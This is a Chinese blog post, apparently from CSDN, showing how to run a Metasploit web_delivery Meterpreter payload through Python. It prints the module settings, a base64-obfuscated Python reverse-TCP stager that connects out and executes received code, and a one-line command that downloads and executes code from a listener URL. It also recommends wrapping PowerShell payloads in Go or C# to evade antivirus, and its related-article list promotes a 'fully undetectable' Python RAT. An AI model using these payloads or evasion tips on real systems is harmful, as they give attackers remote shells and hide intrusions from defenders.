Pyhton加载Meterpreter Web_delivery代码

最新推荐文章于 2024-02-29 16:28:30 发布
最新推荐文章于 2024-02-29 16:28:30 发布
阅读量7.5w 收藏
点赞数
分类专栏: 黑客帝国 文章标签: python hacker meterpreter
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Jailman/article/details/77574162
版权
Webdelivery的options
Module options (exploit/multi/script/web_delivery):

Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH /test no The URI to use for this exploit (default is random)


Payload options (python/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 127.0.0.1 yes The listen address
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
0 Python

生成的文件内容
import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('aW1wb3J0IHNvY2tldCxzdHJ1Y3QKcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQpzLmNvbm5lY3QoKCcxMjcuMC4wLjEnLDQ0NDQpKQpsPXN0cnVjdC51bnBhY2soJz5JJyxzLnJlY3YoNCkpWzBdCmQ9cy5yZWN2KGwpCndoaWxlIGxlbihkKTxsOgoJZCs9cy5yZWN2KGwtbGVuKGQpKQpleGVjKGQseydzJzpzfSkK')))

调用命令
python -c "import urllib2; r = urllib2.urlopen('http://127.0.0.1:8080/test'); exec(r.read());"

使用PowerShell执行的payload语句可以封装到golang或者C#中实现免杀的目的
大囚长
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
metasploit之webdelivery
Yale的博客
01-31 1253
介绍下webdelivery模块 先是启动metasploit 接下来选择我们使用的模块 Show options看看我们需要设置哪些参数 我们注意到,exploit target出现了python,,莫非还有其他的?我们使用show targets来看看 2代表的PSH表示的powershell。我们这次的实验针对的是windows的,考虑到不是所有windows用户都会有python,...
Kali渗透测试:使用Metasploit对Web应用的攻击
Liu_Bruce的博客
05-15 3538
Kali渗透测试:使用Metasploit对Web应用的攻击 Web应用程序的漏洞数量众多,这里我们以其中一个命令注入漏洞为例复现一下。这种漏洞源于Web应用程序没有对用户输入的内容进行准确的验证,从而导致操作系统执行了攻击者输入的命令。下面是一段运行在Metasploitable2靶机上的PHP脚本,它来自于DVWA,代码如下: <html> <body> <form name="ping" action="#" method="post"> &
Metasploit (MSF) 使用-包含基本使用、payload生成、后渗透模块使用
最新发布
dzqxwzoe的博客
02-29 1340
l, --list 列出指定模块的所有可用资源,包括:payloads,encodes,nops,all-p, --payload 指定所需要使用的payload,也可以使用自定义payload,几乎支持全平台-f, --format 指定输出格式-e, --encoder 指定需要使用的encode,指定需要使用的编码。
12.7、后渗透测试--python插件执行py脚本
无痕的博客
12-14 498
metasploit后渗透meterpreter测试--python插件执行py脚本
MSF:web_delivery模块使用测试(Linux)
beefreesky的博客
12-29 211
linux环境下,MSF web_delivery模块使用测试。
python_pythonweb_
10-01
Python Web开发中,"python_pythonweb_"这个标题可能指的是一个使用Python构建的Web服务器或者文件上传功能。从描述来看,“可以接收POST上传文件的python web”表明这是一个能够处理HTTP POST请求,特别是处理...
cps-python.rar_WEBDRIVER PYTHON_python_python web_python web_py
09-21
标题中的“cps-python.rar_WEBDRIVER PYTHON_python_python web_python web_py”暗示了这是一个关于使用Python的Selenium WebDriver库来操作Web页面的教程或代码示例。描述中的“python webdriver登录web页面”...
Python Web开发实战_python_web_
09-29
Python Web开发实战》这本书是针对想要学习和实践Python Web开发的读者精心编写的。它不仅涵盖了基础理论,还深入到了实际项目构建的各个环节,旨在帮助读者从零开始,逐步成为一个全面掌握Web开发技能的专业人士...
PythonWeb开发案例教程_源代码.zip
06-29
Python Web开发领域,源代码是开发者理解和学习项目构建的基础。本教程的目的是带你深入了解Python Web开发,并通过实际案例来提升你的技能。"PythonWeb开发案例教程_源代码.zip"这个压缩包包含了整个教程的实践...
webdriver_pythonweb_python_WEBDRIVERPYTHON_
10-03
运用python中的webdriver库学习自动化,示例为中国大学慕课MOOC+百度+CSDN自动登录程序。
Python-Rootkit:Python远程管理工具(RAT)来获取Meterpreter会话
02-05
python-rootkit 这是一个完全无法检测的python RAT,可以绕过几乎所有防病毒程序并在任何Windows机器内打开后门,这将建立与监听机器的反向https Metasploit连接。 ViRu5生命周期 绕过所有防病毒软件。 将malicius powershell脚本插入内存。 建立与攻击者机器的反向https连接。 每10秒钟检查一次,并确保该连接仍然存在。如果不存在,它将重新建立新的连接。 添加启动注册密钥,以在重新启动后重新连接到攻击者。 脚步 使用您的lhost和lport更新viRu5 / source.py参数 将source.py名称更改为Googl
Empire安装,基本介绍,命令使用,监听(一)
single_g_l的博客
03-12 4554
目录 一.​Empire介绍 二. 安装Empire 1.命令安装 2.Git安装 3.Docker安装 三. 基本使用 1. Empire拥有客户端和服务端 2. 客户端操作 1) 基础命令 2)监听器 四. Empire 基础详解(模块,命令) 1.empire 相关命令 2. interact 命令 3. uselistener 监听模块 4. usestager模块(payload) 5. usemodule privesc 提权模块 6.PowerBr...
渗透测试-window反弹shell
lza20001103的博客
05-11 4310
window反弹shell
metasploit怎么用? 进阶(msfvenom=payloads+encoders)篇 (゚益゚メ) 渗透测试
寻觅的博客
02-06 2014
靶机搭建与配置网络环境 这里搭建环境比较复杂,可以想要手动搭建的可以参考其他大佬的博客:域渗透环境搭建。 靶场搭建还是比较复杂的,我们主要也不是做服务器运维的,所以这这里我们可以使用已经搭建好的靶场环境,这里我转载了几个已经搭建好的靶场环境放到了我的云盘里。需要的可以下载使用,下方我做测试的环境都是使用的de1ay-ATT&CK红队评估二其中的三个环境。 链接:https://pan.baidu.com/s/1snQWjtCXeQT9VJlqGtpdDw 提取码:pikp 使用非常简单,只需要将.
MSF:web_delivery模块使用测试(Windows)
beefreesky的博客
12-29 256
Windows环境下,MSF web_delivery模块使用测试
[我的作死案例]图书馆泡妹记 上
wjy397的专栏
06-28 3234
https://bbs.ichunqiu.com/thread-24168-1-1.html 吾本布衣i春秋-呆萌菜鸟 发表于前天14:28253388 本帖最后由 0nise 于 2017-6-26 10:14 编辑 缘起缘落:简单来说,图书馆看见一个妹子长得还不错,然后...
Metasploit 对 IE 浏览器的极光漏洞进行渗透利用
Epsilon
03-02 5011
极光漏洞实际上是利用了堆喷射技术。下面我们来演示渗透过程。 1、查看 win xp 系统状态 目前的cpu和内存消耗极低。 2、在kali linux下利用 metasploit 渗透。 msf > use windows/browser/ms10_002_aurora msf exploit(ms10_002_aurora) > set payload windows/
(记录向)使用MSF的web_delivery模块上线
daxi0ng的博客
11-30 1403
前言:在msf上生成木马传到目标机器执行上线累死个人,还是一条命令上线比较舒服。 目标环境: Centos6.5 1、选择exploit/multi/script/web_delivery模块 2、选择目标系统,我这里选择Linux 3、选择payload,我这里选择linux/x64/meterpreter/reverse_tcp , 4、本机监听一下 5、运行,生成一条命令 6、目标机器执行上线。 7、获取一个友好的交互界面。python -c 'import ...
MetaSploit攻击实例讲解------工具Meterpreter常用功能介绍(kali linux 2016.2(rolling))(详细)...
weixin_34077371的博客
05-20 905
      不多说,直接上干货!       说在前面的话   注意啦:Meterpreter的命令非常之多,本篇博客下面给出了所有,大家可以去看看。给出了详细的中文   由于篇幅原因,我只使用如下较常用的命令。                 这篇博客,利用下面的这个xploit/windows/browser/ms10_046_shortcut_icon_d...
python安装en_core_web_sm 2.0.0版本
06-12
3. 最后,在Python代码加载en_core_web_sm模型,可以使用以下代码: ``` import spacy nlp = spacy.load('en_core_web_sm') ``` 现在,你就可以在Python中使用en_core_web_sm 2.0.0版本了。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值